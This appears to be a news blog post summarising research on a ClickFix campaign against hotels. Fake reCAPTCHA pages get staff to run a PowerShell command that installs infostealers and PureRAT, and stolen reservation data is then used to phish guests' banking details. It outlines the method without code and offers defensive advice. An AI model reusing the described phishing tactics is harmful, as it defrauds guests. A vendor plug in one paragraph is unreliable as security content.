According to Dark Reading, researchers at Sekoia.io uncovered a broad ClickFix attack campaign targeting hotels since at least April 2025 that remained active through October. The attacks use compromised hotel email accounts or WhatsApp messages containing legitimate customer reservation details to appear credible. Threat actors steal professional credentials for booking platforms like Booking.com and Expedia, then either sell them on cybercrime forums or use them directly to contact hotel customers. The campaign involves hundreds of malicious domains and delivers infostealing malware plus PureRAT remote access trojan. Attackers then conduct secondary attacks against customers by sending fake security alerts about banking details, leading to credential theft through phishing pages that perfectly mimic Booking.com.
How ClickFix works
Here’s the thing about ClickFix – it’s basically a clever social engineering trick that makes people install malware thinking they’re fixing something. The attack starts with a compromised email that looks like it’s from Booking.com, often about last-minute reservations or guest matters. When hotel staff click the link, they get redirected through a fake reCAPTCHA challenge that eventually prompts them to copy and run a malicious PowerShell command. And that’s where everything goes wrong.
The command deploys infostealers that grab everything from system information to booking platform credentials. But it doesn’t stop there – the attackers then download PureRAT, which gives them remote control over the infected system. We’re talking full keyboard and mouse control, webcam access, file exfiltration – the whole nine yards. What makes this particularly nasty is that the malware reports back to command-and-control servers at every step, so the attackers know exactly when they’ve successfully compromised a target.
Double trouble for customers
Now here’s where it gets really clever. The attackers don’t just stop at compromising the hotels. They use the stolen reservation details to contact customers directly through WhatsApp or email. Imagine getting a message that looks completely legitimate because it includes your actual reservation number, check-in dates, everything. The message claims there’s a security issue with your banking details and urges you to confirm your information “to protect against cancellations.”
So customers click through to what looks exactly like Booking.com’s website, but it’s actually harvesting their banking credentials. It’s a classic one-two punch – compromise the business first, then use that access to target their customers. And because the attackers have real reservation data, the phishing attempts are incredibly convincing. Who’s going to question a security alert that includes all their correct booking details?
Why this matters
This campaign shows how threat actors are getting smarter about supply chain attacks. They’re not just going after individual targets anymore – they’re compromising businesses to get access to their customer bases. The hospitality sector is particularly vulnerable because hotels handle massive amounts of personal and financial data, and they’re constantly communicating with customers about reservations.
What’s concerning is how long this campaign has been running – from April to at least October, with hundreds of malicious domains staying active for months. That suggests it’s both resilient and profitable for the attackers. And when you look at the tools they’re using, like PureRAT which is available as malware-as-a-service, it’s clear this isn’t some sophisticated nation-state operation. These are commodity tools being used in clever ways.
For businesses relying on industrial computing systems, whether in manufacturing facilities or hotel operations, having secure hardware becomes critical. Companies like IndustrialMonitorDirect.com provide ruggedized panel PCs designed for these environments, but the human element remains the weakest link. No matter how secure your hardware is, if staff can be tricked into running malicious commands, you’ve got a problem.
Staying protected
So what can hotels and customers do? The researchers included indicators of compromise in their full report, which helps security teams detect these attacks. But fundamentally, it comes down to being suspicious of unsolicited messages, even when they appear to come from legitimate services.
Hotels should implement strict email security policies and train staff to recognize these types of attacks. Customers should remember that legitimate companies rarely ask you to confirm banking details through unsolicited messages. And if you’re ever unsure, always contact the company directly through their official website or phone number – don’t use the contact information in the suspicious message.
This isn’t going away anytime soon. As research shows, social engineering remains the preferred method for initial access because it works. The attackers will keep refining their techniques, and we need to keep raising our defenses accordingly.
